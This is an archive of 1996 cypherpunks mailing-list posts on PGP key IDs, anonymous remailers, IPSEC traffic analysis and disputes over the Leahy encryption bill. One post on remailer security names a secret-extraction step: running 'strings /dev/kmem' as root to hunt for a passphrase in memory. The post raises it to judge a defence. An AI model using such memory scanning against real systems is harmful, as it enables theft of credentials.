>PUBRING.PGP with only the key I want to use ?

You can specify by the keyid. Do a pgp -kvv:

	$ pgp -kvv cmca@alpha.c2.org
	Type bits/keyID    Date       User ID
	pub  1024/6C87FFA5 1996/02/06 Chris McAuliffe <cmca@alpha.c2.org>
	1 matching key found.

Now do the encryption
	$ pgp -e 0x6C87FFA5 file

Note the '0x' prefix on the keyid

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMUS+3IHskC9sh/+lAQF8jgP+LdUjgTnfv5k4KsOwEuvPmVsw/V/G3jdD
pyNwOQNtytjSDcGBobspmU4rcx1DObToitJqjzr74G1ytGkrr4wHRS4FWIy3Ea3U
YgrmEhkviJT7B4Ix/vQcrKZJsn2+ZGML6VyVmWr3ehkEMo20UfjIheeTNUSq2OPL
rO9LmZiFyhs=
=MSju
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Kedrosky <pkedrosk@sms.business.uwo.ca>
Date: Wed, 13 Mar 1996 01:06:19 +0800
To: cypherpunks@toad.com
Subject: Your "switchboard" listing
Message-ID: <3144A42E.7506@sms.business.uwo.ca>
MIME-Version: 1.0
Content-Type: text/plain


Ha! Very funny that you have yourself listed as Mssr Thomas Pynchon in 
Switchboard's listings. I especially like the mailing address. 

P.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 12 Mar 1996 14:52:45 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Do you feel lucky, punk?
In-Reply-To: <m0tvx9W-0008zBC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960311175225.23260F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




[rant including some very dubious abstracts of legal opinions deleted]

Not only is your law poor and badly reasoned, your mastery of 
the jurisprudence of forfeiture law flawed, and your rhetoric twisted, 
but you don't seem to know the difference between dicta and holdings.

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 13 Mar 1996 01:25:01 +0800
To: cypherpunks@toad.com
Subject: Cryptographers practicing law?
Message-ID: <m0twJOL-00091HC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:28 PM 3/11/96 -0500, Perry E. Metzger wrote:
>
>anonymous-remailer@shell.portal.com writes:
>> This is the second in a regular series of postings to expose
>> cryptographers and cypherpunks who are either lying to us or
>> making a very serious mistake in there judgement.
>
>No, this is the umpteenth stupid anonymous denunciation of people who
>deserve no such stupidity.
>
>You aren't fit to eat Bruce Schneier or Matt Blaze's toenail
>clippings.
>Perry

While I don't really appreciate this guy's style and anonymity any more than you do, 
it's a misleading argument to try to challenge his position based on 
(presumably) his crypto expertise or lack of it.  I don't doubt Schneier's 
or Blaze's commanding position in that limited area, but when it comes to 
the analysis of a bill affecting crypto, knowledge of the technical details 
of crypto is far less important than knowing how a prosecutor or court will 
interpret any given law.  

I'm an "expert" in neither field, but I knew enough to worry.  Further, 
after having read Junger's preliminary analysis, it is blatantly obvious 
that this bill doesn't constitute much of a step forward, and in fact is 
likely a retrenchment if the government has its way.  The "guarantees" the 
bill provides aren't really guarantees at all, they are "feel-good" 
conditional promises, and the whole thing is so shot full of holes that it's 
hard to imagine that it will provide any protection beyond what we have today.

As I noted in my original comment to VTW (Mr. Safdar, who hasn't taken the 
trouble to contradict, let alone respond to my comments) my biggest fear is 
that the organizations and people who originally came out in mistaken favor 
of this bill either won't see their mistake, or won't admit seeing it if 
they do.  (People are funny that way; they hesitate to admit it when they 
are clearly wrong; organizations are even worse on this score; tiny 
organizations are worse still, because they must "appear" to be externally 
consistent yet there are few "heads" to depend on to fix mistakes.) 

If anything, _MY_ mistake was in believing that the rest of the bill was 
acceptable if a single bad section was removed; I now believe (after seeing 
Junger's analysis, and a much more careful reading of the bill) that a 
serious re-write is mandatory. (In my 
own defense, I had only skimmed the rest of the bill once, I focussed my 
criticism on the one "killer" section that I could easily tell would be the 
most questionable item.)

This fiasco does, indeed, raise serious questions about the motivations and
credibility of those who have effectively endorsed this bill so soon:  It 
is doubtful whether we will get any accurate picture about the bill from 
anybody who is afraid of changing his original assessment.

I'd be just as willing to listen to "experts" quoted by the people who have 
(so far) expressed support for this bill.  Maybe, as he himself suggests, 
Junger is a bit too pessimistic. On the other hand, Junger has clearly 
raised many questions whose answers depend almost completely on the INTENT 
of people within the government, not the wording of the bill itself.  Since 
I believe their intent to be uniformly bad, it is hard to imagine how anyone 
could resurrect confidence in this bill to anyone who was similarly 
pessimistic.

And the people who originally claimed that the Administration would oppose 
this bill as "going too far" cannot now turn around and claim that the 
government's intent was anything other than bad, BTW.  We now see how little 
good this bill might do, and how much trouble it might allow the Feds to 
cause, so it's hard to imagine why anyone would have believed the bill (if 
passed) would not have been signed.

I predict that the organizations that have, so far, "endorsed" this bill 
will quietly stop doing so, but without any kind of specific retraction or 
apology or explanation.  I also believe that they will refuse to reveal 
whatever legal advice they originally received that induced them to endorse 
it, because they probably had none.

At least Leahy's bill is DOA.  However, I think it would be interesting and 
useful to do a re-write of this bill, addressing all of Junger's concerns, mine as 
well, and Tim May's to boot.   I recommend that we totally ignore comments  
such as those by Padgett Peterson which claimed that certain provision 
"must" be included for the bill to pass.

Jim Bell
jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Mar 1996 14:56:39 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: noise levels
In-Reply-To: <ad69acd619021004de89@[205.199.118.202]>
Message-ID: <199603112321.SAA29939@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> At 4:55 PM 3/11/96, Perry E. Metzger wrote:
> >Noise levels have been rising fast again. I encourage people to think
> >about whether things are on topic before they post.
> >
> 
> I again encourage Perry to consider learning how to use filters.

I again point out that without artificial intelligence, filtering is
very difficult. I already filter, but at best this eliminates about
one third to one half of the noise. The rest would require that the
filters actually understand the messages, which they cannot.

> While I happen to be uninterested in many of the topics being discussed, I
> realize that one man's noise is another man's signal.

Why have thousands of mailing lists and newsgroups on the internet if
everything belongs everywhere? Why not just have one big one and
"filter"?

The answer is obvious. It wouldn't work.

> Besides, the C coders and crypto mavens created their own protected list,
> the Coderpunks list, and this is where Perry and others can presumably find
> the high S/N discussion of Java, Diffie-Hellman, applets, DES, and memory
> leaks that he so craves.

I see we are becoming contemptuous of those who actually write pay
attention to the nuts and bolts of cryptography, eh?

Tim, why don't you go off with Jim Bell and the rest and start a
mailing list devoted to nothing but random chit-chat?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Wed, 13 Mar 1996 01:06:43 +0800
To: Raph Levien <raph@CS.Berkeley.EDU>
Subject: Remail Software Where?
In-Reply-To: <199603111450.GAA01786@kiwi.cs.berkeley.edu>
Message-ID: <Pine.A32.3.91.960311183748.33978A-100000@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text/plain



Seems that berkeley's ftp ain't talking anymore.  Where are the remailer 
packages living these days? 

Benji






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Tue, 12 Mar 1996 13:31:50 +0800
To: savron@world-net.sct.fr
Subject: Re: PGP reveals  the key ID of the recipient of encrypted msg
Message-ID: <v02140b06ad6a377d44bf@[165.254.158.237]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:25 3/11/96, savron@world-net.sct.fr wrote:

>I began testing PGP  a few days ago ( I'm a PGP newbie ) and I found
>that it gives out the key ID of an encrypted message . From this you
>can get the  identification of the recipient of the message , if it's
>someone who has publicaly  distributed his  key (keyserver , homepage
>...) . So even if you are unable to decode the message you  can find
>who is the recipient of a given message . I think this is a big
>privacy problem .

There is little that can be done about this. There must be something in the
message to identify who it is intended to be read by. As someone else has
stated, you can always set up private keys to be used to send to you that
are different from your Public KeyID for cases where you want to hide your
identity or that of the party you are communicating with.

>The problem is carried along when you encrypt a message for multiple
>recipients , you get the key IDs of all the recipients and same
>problem as above .  I think something like 'blind email copy' should
>be used , because the recipients don't have to know the identity of
>each other .

If you want to hide the recipient list, then send separate messages to each
recipient - each of which is only encrypted to that one respective
recipient.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant, ULC" <mark@unicorn.com>
Date: Tue, 12 Mar 1996 07:18:17 +0800
To: Nelson Minar <nelson@santafe.edu>
Subject: Re: anonymous web pages (Was: SurfWatch)
Message-ID: <Pine.3.89.9603111856.A446-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Mar 1996, Nelson Minar wrote:

> I proposed this a couple of months ago, there should be a bit of
> discussion left over in the archives. My idea was to have an account
> keyed to a password - if you emailed the server with the right
> password, it would take the text of your email and put it in the
> specified URL. Then you can use remailers to preserve anonymity with
> the server. It's sort of like the alias.c2.org accounts.

I have something like that (not yet finished or released). I run a mailbot
which accepts mail to a unicorn.com address and allows remote updating of
my WWW tree (and a lot of other things, e.g. mailing lists, multiple
mailbox support, etc). It just checks the PGP signature matches the www
key in my PGP keyring, and performs the update if it does. 

Most of the interest I've had in the release version was from people who
wanted remote updates of their non-anonymous sites by email, but it could
easily be used for anonymous accounts. Much more secure than just using a
plaintext password (of course neither are secure if someone can log into
your account, but if they can do that, they can modify your Web pages
directly). 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Tue, 12 Mar 1996 13:50:07 +0800
To: cypherpunks@toad.com
Subject: Noise levels
Message-ID: <199603120033.TAA30130@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain



Once again I'd like to remind everyone that I run a customized filtering
service that drops off a single message in your inbox every day or two,
consisting of what I deem to be the most entertaining and informative posts.
I also remove any non-topical rants that don't include useful information.
This way, your overworked mail filters will never again have to deal with
the Perry and Tim show.

To subscribe, send a polite message to the human behind this address.

-- 
http://yakko.cs.wmich.edu/~frogfarm  ...for the best in unapproved information
Tell your friends 'n neighbors you read this on the evil pornographic Internet
"Where one burns books, one will also burn people eventually." -Heinrich Heine
People and books aren't for burning. No more Alexandrias, Auschwitzs or Wacos.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Loren James Rittle <rittle@comm.mot.com>
Date: Tue, 12 Mar 1996 18:59:58 +0800
To: cypherpunks@toad.com
Subject: Re: FCC & Internet phones
In-Reply-To: <199603100507.AAA02942@homeport.org>
Message-ID: <9603120137.AA17060@supra.comm.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>From: Adam Shostack <adam@lighthouse.homeport.org>
>Date: Sun, 10 Mar 1996 00:07:20 -0500 (EST)

>Presumably, the signal has a number of charictaristics.  Some of them
>have a central switchboard, where preople go to set up calls.

Hum, I would set-up the system to `dial direct'.  Maybe I could
give you this one, for systems that allow random-chat modes.

>Most
>presumably use a mix of a UDP data connection and tcp for control
>functions.

OK, everything after the IP header is encrypted.  I don't even know
which protocol is in use.

>They all consist of high volume, long duration connections
>(or data flows in the case of UDP.)  Many probably use a standardized
>destination port.

OK, everything after the IP header is encrypted.  I don't know
which port is in use.

>They might use the urgent pointer to force data up
>the stack quickly.

OK, everything after the IP header is encrypted.  I don't know
which protocol options are in use.

>	In short, yes the data streams can be easily found, if one can
>tap and grep a T3 in real time.

In short, assuming IPSEC, the data stream cannot be easily found.
Slightly different assumptions led to a radically different outcome.

Regards,
Loren
- -- 
Loren J. Rittle (rittle@comm.mot.com)	PGP KeyIDs: 1024/B98B3249 2048/ADCE34A5
Systems Technology Research (IL02/2240)	FP1024:6810D8AB3029874DD7065BC52067EAFD
Motorola, Inc.				FP2048:FDC0292446937F2A240BC07D42763672
(708) 576-7794				Call for verification of fingerprints.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUTVK/8de8m5izJJAQGOQQP/R0iXXj4hSytLhifxkxWjkCHItIpQAZvZ
J73NdpVIK3EOO8dEXl4jWimh//mTmW5Zt0kIyZtRW4Sn5UlE6FHkG7fnNfgSZbzR
8fu0XOM3ScRKioNhdp0e5ECnB6WrqaSRgTH0K9e+oheAN2zVob/bTb0Gh+gSe930
Znf9388LkZ4=
=JMrb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 12 Mar 1996 12:24:07 +0800
To: cypherpunks@toad.com
Subject: Remailer passphrases
In-Reply-To: <199603111015.LAA10327@kampai.euronet.nl>
Message-ID: <Pine.LNX.3.91.960311201231.205A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 11 Mar 1996, Gary Howland wrote:

> This of course assumes that the remailer runs as a process - if it doesn't
> then there is no reason a 'remailer helper' cannot.
> 
> The only disadvantage of this is that the remailer cannot be rebooted
> without a passphrase being entered, but then there are ways around this
> (entering the passphrase remotely over a secure link etc., or more
> sophisticated 'remote authorisation' systems).
> 
> The advantage of this is that the password is never on the disk,
> only in memory (which will take serious (read "expensive") to extract).

I don't know that it would be that expensive.  If someone was able to gain
root access to the system, something like "strings /dev/kmem" could narrow
the search for the passphrase down significantly.  Of course one could
obfuscate the passphrase by XOR'ing it with 0x80, but that's only security
through obscrurity.

- --Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMUTQWrZc+sv5siulAQFH4wP/YOY0gxwW/F4+D/kt8cXw47XhldBfd8bK
9jM50XoZLOv9QHs6udtmIro1+2Dkb8eZz8HBn4gn+CVAIqso10LvevGXe8TpZ96p
iO/XRm3LDpkdrt6mHoCC/J679hQ5nJgB0PThsBNl8MpW5mZMF5kZp9RWTosVsY3N
FKGVQQSQ0VA=
=UiDo
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: medea@alpha.c2.org (Medea)
Date: Tue, 12 Mar 1996 20:06:52 +0800
To: cypherpunks@toad.com
Subject: Re: Do you feel lucky, punk?
Message-ID: <199603120446.UAA13698@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


At 04:02 PM 3/11/96 jim bell scribbled:
>
>Again, you give no specific examples.  And what is "twisted >rhetoric", at least as you've used it here?
>
>>but you don't seem to know the difference between dicta and holdings.
>
>I didn't use either term.  Neither did George Will.

  You don't know what you're talking about - it's as simple as that.  When someone points out to you the error of your ways using terms you're not familiar with, then display that at least one brain cell is working and look up the terms.
  Your response that you don't use them is childish.  Was it meant to imply that you and George Will have formed a *Proud to be Stupid* club?
  <end of off-topic flame but deemed it necessary>

Medea


============================================================
+++++++++++++++++++++++++++++++++++++++++++++++++++
+ |---------------------------------------------| +
+ | The mind is its own place, and of itself    | +
+ | Can make a heaven of hell, a hell of heaven | +
+ |---------------------------------------------| +
+++++++++++++++++++++++++++++++++++++++++++++++++++











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Tue, 12 Mar 1996 17:37:08 +0800
To: "A. Padgett Peterson P.E. Information Security" <cypherpunks@toad.com
Subject: re: Video resolution
Message-ID: <199603120520.VAA08288@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:14 AM 3/11/96 -0500, A. Padgett Peterson P.E. Information Security wrote:
>Note: this refers to the IBM PC & clones only
>
>> The point is that they do a lousy job on dithering.  So does Microsoft
>> explorer.  They probably purchased the identical code from some clot.

>Have been watching this go back and forth & get further from the original
>question as usual. I suspect that if the original poster looks in her/his/
>its/other SYSTEM.INI file, the line "display.drv=vga.drv" will be found in
>the [boot] section. This is the default 16 color driver installed by 
>Windows to be compatible with every 256k 640x480 VGA card.


And I also remembered to turn the computer on.

I can assure you that I know how many colors my screen supports, and I have 
numerous dithering programs on my computer, two of them written by me.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 12 Mar 1996 20:18:52 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Do you feel lucky, punk?
Message-ID: <m0twMLA-00093EC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:59 PM 3/11/96 -0500, Black Unicorn wrote:
>On Mon, 11 Mar 1996, jim bell wrote:
>
>> At 05:54 PM 3/11/96 -0500, Black Unicorn wrote:

>> >Not only is your law poor and badly reasoned,
>> 
>> Just what George Will said about this recent Bennis SC decision.
>
>My issue was with your application of the cite and decisions to the 
>pending bill.  

You keep saying this kind of thing, repeatedly, but you don't back it up 
with a contrary argument.


>> > your mastery of  the jurisprudence of forfeiture law flawed,
>> 
>> Ditto, and I notice you give no specific examples.  Why is that?
>
>My issue was, again, with regard to your choice of cites, 

Ah!  You simply didn't like me using that particular atrocious SC decision 
to suggest that we can't trust judges and courts in general!  


>the way you 
>chose to apply them to represent a general (and flawed) attitude toward 
>statuatory construction,

"Flawed"?  In what way?  You keep making claims that you don't back up with 
facts.  


> and the manner in which you try to mold all of 
>the above in a way suggesting it has the least bit to do with the bill in 
>question.

You keep making assertions that I'm wrong, but you don't demonstrate the 
"correct" interpretation according to your opinion.  Why is this?


>But, for the sake of equality, let's examine some of your legal assertions.  
>Or, more accurately, legal conclusions.  (BTW, where is your J.D. from?)
>
>1> In fact, I would argue that a remailer operator will actually be 
>considered MORE responsible, legally, than Mrs. Bennis:
>
>2> I argue that a person who runs an anonymous encrypted remailer could be
>clearly claimed to be  "entrusting" that "property" to someone else, under
>the meaning of the above paragraph.
>
>The "above paragaph," incidently, doesn't even rise to the level of court 
>dicta, but is a abstract of dicta by a court commentator.  Using such 
>authority to back a legal conclusion (especially when applied to an 
>entirely seperate legal area) is twisted at best, and dangerous at worst.

Let's suppose we agree that "George Will" is a "court commentator."  Suppose 
further that he, more or less, says "this decision sucks."  Because it DOES 
suck.  To any normal person, the knowledge that a educated, erudite, 
intelligent person who has published a newspaper and magazine column for 
years says "this decision sucks" (although he did it a lot less coarsely 
than I relate) should be of interest.  And most people of ordinary levels of 
intelligence can recognize that yes, the decision DOES suck.  And George 
Will, who has certainly NOT become successful as a commentator by boring the 
reader, understands that this decision is of interest to enough people to 
have it occupy one of his columns for a day.

Remember, one of the basic assumptions that any supporter of the Leahy bill 
could be making is that it will be interpreted INTELLIGENTLY by courts.  If 
it is obvious to most of the rest of us that those lunatics can't even make 
the correct decision about a woman's half-interest in a common automobile, 
then their ability to decide whether an anonymous encrypted remailer is 
somehow breaking the law merely by forwarding unidentified traffic is 
certainly in question.

The fact that you may not _like_ me bringing up a contemporaneous example 
where the SC stuck their collective heads firmly and completely up their 
respective asses is irrelevant.  If anything, it shows that you feel the law 
is and should be above the heads of the average individual, or even the 
UN-average, intelligent individual who regularly reads editorials in their 
local newspaper.

Such elitism is disgusting.

>3> At least, that is the position the prosecutors could surely take, 
>especially given this Supreme Court decision.
>
>Uh huh.  They might also take the position that the defendent is ugly, 
>and should be convicted.  That doesn't make it a legally viable argument.

Unfortunately, the only thing that determines whether, in fact, something is 
a "legally viable argument" is the dishonesty and stupidity and connivance 
of the person or people making the resulting decision, in this case the 
Supreme Court. (Or didn't you know that?)  It is, given the current 
make-up on the Supreme Court today.  Sad but true.  Naturally, this reality 
embarrasses you.  Your Emperor isn't wearing any clothes.


>> > and your rhetoric twisted, 
>> 
>> Again, you give no specific examples.  And what is "twisted rhetoric", at 
>> least as you've used it here?
>
>I'm not going to delve into semantics or be distracted by a war of the 
>dictionaries. 

But you already did.  You called my rhetoric "twisted."  "Twisted" implies 
that there is an "untwisted" version.  I await hearing it.  I'll probably be 
waiting a long time at the current rate you're getting to the point.

> You proport to be knowledgeable in these areas, and yet 
>say nothing of value.


I say nothing you want to hear.  That's precisely why you consider it of no 
value.


>  Your appeal (what of it there is) is based 
>entirely on skewing meanings, using critiques of dicta, and generally 
>applying inflamatory language taken out of context in a manner which suits 
>you.  I don't think I'm off base calling it "twisted."

"Inflammatory language"?  The real "inflammatory language" occurs every time 
a court makes yet another outrageous decision such as the ones you are 
weakly attempting (and miserably failing) to defend.

I notice you don't provide an alternative competing interpretation, either 
of my conclusions or those of George Will.  So how are we to know what 
"twisted" is if  you can't clearly show something which is "untwisted"?


>> Maybe you read that item too rapidly to notice that most of it was George 
>> Will's column, not my wording.  
>
>Again, its application to the bill is what I question.  All of which 
>throws your understanding of law, dicta, holdings, jurisprudence, and 
>rhetoric into question.  What you should have cited was some statuatory 
>construction and legislative history cases, not forfeiture law.  But how 
>could you be expected to know this?

I chose my example to display the foolishness of the Supreme Court, as well 
as each and every one of the courts below it that did not properly dispose 
of that Bennis case.  You find this disturbing.  But it's applicable to ANY 
law that may someday rely upon a SC decision to overturn or uphold.  
Anyone considering supporting the Leahy bill had better understand this.  
Naturally, you want to cover it up.


>> What, then, was the point of sending me the note, as well as wasting 
>> bandwidth on CP to share your unhappiness?
>
>Distribution of reputation capital (or in this case, negative reputation 
>capital).  I believe I also wanted to make a point (in 1,200 bytes) about 
>the utility (or lack thereof) of your article (10,500 bytes) on this list.

I'd glad to see you distributing YOUR "negative reputation capital."  Why 
not do a better job for yourself and make it look like you are actually more 
familiar with the legal system than the rest of us are (which shouldn't be 
hard, if you have the credentials), and challenge us with an alternative 
explanation of the facts I (and George Will) describe?

In other words, stop just saying I'm wrong and start DEMONSTRATING it, if 
you can.  Convince us that you're not just an elitist snob and that we 
should actually have confidence that the scum on the Supreme Court will be 
gone soon and replaced with people who know how to make a correct decision 
reliably.  At that point, the Leahy bill (with substantial modifications) 
will start looking a lot better to all of us.


Jim Bell

jimbell@pacifier.com

Klaatu Burada Nikto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 12 Mar 1996 20:08:08 +0800
To: cypherpunks@toad.com
Subject: Re: Cryptographers against cryptography
Message-ID: <199603120523.VAA00317@ix14.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:35 AM 3/11/96 -0800, you wrote:
>This is the second in a regular series of postings to expose
>cryptographers and cypherpunks who are either lying to us or
>making a very serious mistake in there judgement.
.....
>B. Schneier: bs208@newton.cam.ac.uk, schneier@counterpane.com
>M. Blaze: mab@crypto.com, mab@research.att.com
>J. Bizdos: jim@rsa.com
>S. Safaddar: shabbir@vtw.org
>D. Weinstein: djw@vplus.com
>P.. Peterson: padgett@hobbes.orl.mmc.com
>B. Stewart: stewarts@ix.netcom.com

Oh, boy, now I'm a Tentacle Again!
But at least I can spell....
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Tue, 12 Mar 1996 20:15:00 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: A lengthy preliminary analysis of the Leahy bill.
Message-ID: <199603120546.VAA10498@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:26 PM 3/11/96 -0500, Peter D. Junger wrote:
>     (4) the authority and ability of investigative and law enforcement
>     officers to access and decipher, in a timely manner and as provided
>     by law, wire and electronic communications necessary to provide for
>     public safety and national security should also be preserved;


This provision of the bill makes the entire bill a worthless 
pile of repressive shit, despite all the pious good intentions
in the rest of the bill.

A little constitutional history:

The supreme court used to rule that congress could not delegate 
its own power to bureaucrats, as this violated the principle of 
rule of law.

Thus congress could pass a law than in a certain situation you had 
to do such and such, or refrain from doing so and so, but it could 
not pass a law that in a certain situation you had to do whatever 
some bureaucrat told you to do, because that would violate 
separation of powers and the principle of the rule of law, not men.

Roosevelt threatened to stack the court, the court submitted, and the rule
of law in the US was radically diminished.

The proposed bill would seem to give bureaucrats the power to set aside the
first, fourth, and fifth amendments, at whim.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Tue, 12 Mar 1996 17:54:34 +0800
To: cypherpunks@toad.com
Subject: Re: TWP on Crypto Keys
Message-ID: <199603120544.VAA02212@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain


Somebody posted this editorial this morning, that includes the
following passage:

>    The Washington Post, March 11, 1996, p. A18.
> 
>    Security and Software [Editorial]
...
> 
>    Legislation introduced this month in both the House and the
>    Senate would ease the export restrictions while attempting
>    to meet some of the government's security concerns. Code
>    makers would deposit a "spare key" to any exported
>    encryption software with a trusted third-party agency...

Now, I thought that the bills did no such thing.  How could The
Washington Post get this so wrong?

As I understand it, the bills do not in any way tie export to
key escrow.  They mention key escrow only to the extent that
they specify that it is illegal to disclose the keys.

Why would the paper get this cockeyed?  Is it just a screwup,
or are they pushing for a change?

thad
-- Thaddeus Beier                     thad@hammerhead.com
   Technology Development                   408) 286-3376
   Hammerhead Productions        http://www.got.net/~thad 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Tue, 12 Mar 1996 14:21:37 +0800
To: cypherpunks@toad.com
Subject: Re: Leahy bill nightmare scenario?
Message-ID: <199603112056.VAA12425@kampai.euronet.nl>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:
>At 11:12 AM 3/11/96, Gary Howland wrote:
>>Dan Weinstein writes:
>
>>> If I rent cars, someone might one day use a car rented from me in a
>>> robbery.  Does that make my an accessary?  NO.
>>
>>This is an unfair analogy.  Now if you had said that you rented cars
>>without asking for proof of identification, thus making your car hire
>>centre very useful to robbers, that may more closely resemble the
>>anon-remailer situation.
>
>If a hotel rents a room to someone who commits a crime in that room, e.g.,
>prostitution, drug use, plotting to blow up a building, can the hotel be
>seized under the asset forfeiture laws?

I didn't initially use the the car-hire analogy, I was just trying to
bring it more into line with the anon-remailer situation.  Perhaps a
better example would be an agency set up for the sole purpose of hiring
cars on behalf of anonymous customers - as long as the customers didn't
abuse the anonymous facility too much, then I guess they would be allowed
to carry on operating, much like the remailers operate at present.
However, I guess they're in for trouble when their service starts being
abused at the expense of big brother, and I guess their policy of shredding
all evidence at weekends won't help matters either.


>If I let someone use my telephone without confirming his identity, am I
>liable for crimes committed with this phone?
>
>This last example is, I submit,  a nearly perfect parallel to anonymous
>remailers. And not because the telephone system is a "common carrier," but
>because of scienter: I have no knowledge, and cannot be expected to have
>knowledge, of crimes committed with my phone.

But this doesn't match the remailer scenario - this example is better
likened to me letting you use my email account whilst at my house.


>And, finally, packages and letters may be mailed anonymously. This is what
>pre-paid stamps are all about. And I've used non-U.S. Postal Service
>package delivery sytems without providing identification. Can Federal
>Express have their assets seized because of "anonymous remailing"?
>(Quibblers will no doubt cite laws requiring FedEx to "cooperate," demand
>ID, etc.)

Yes, but when was the last time someone physically mailed copyright source
code (eg RC2) to half the world?  When was the last time a pair of lawyers
made worldwide news due to making a phone call?
Again, the anon-postal-mail/anon-telephone-call analogy doesn't work.


Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@kampai.euronet.nl>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Tue, 12 Mar 1996 18:05:36 +0800
To: cypherpunks@toad.com
Subject: Re: Leahy and Mrs. Bemmis (now that's a subject line)
Message-ID: <199603120603.WAA12207@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:24 AM 3/11/96 -0500, A. Padgett Peterson P.E. Information Security wrote:
> At the same time am pragmatic enough to accept the idea that it will have
> no effect unless it passes and to be passed today it must have something
> like the criminalization statement. 

I am glad to hear that the bill can be easily stopped.  I think we should 
do something to kill it right away.

The only good thing the bill does is give big companies the same power 
that most of us now possess -- the power to export crypto and get away
with it.   A good thing, a very good thing, but small change compared to 
the important individual liberties that the bill lightly discards.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
